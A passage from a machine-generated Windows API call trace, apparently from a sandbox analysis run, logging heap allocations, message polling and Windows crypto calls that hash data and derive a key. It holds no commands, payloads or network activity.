wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.183] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.183] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.183] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0168.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.184] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.184] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.184] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.184] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0168.187] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0168.187] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.187] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0168.187] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0168.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0168.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0168.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0168.189] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0168.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d460 [0168.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d460, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: 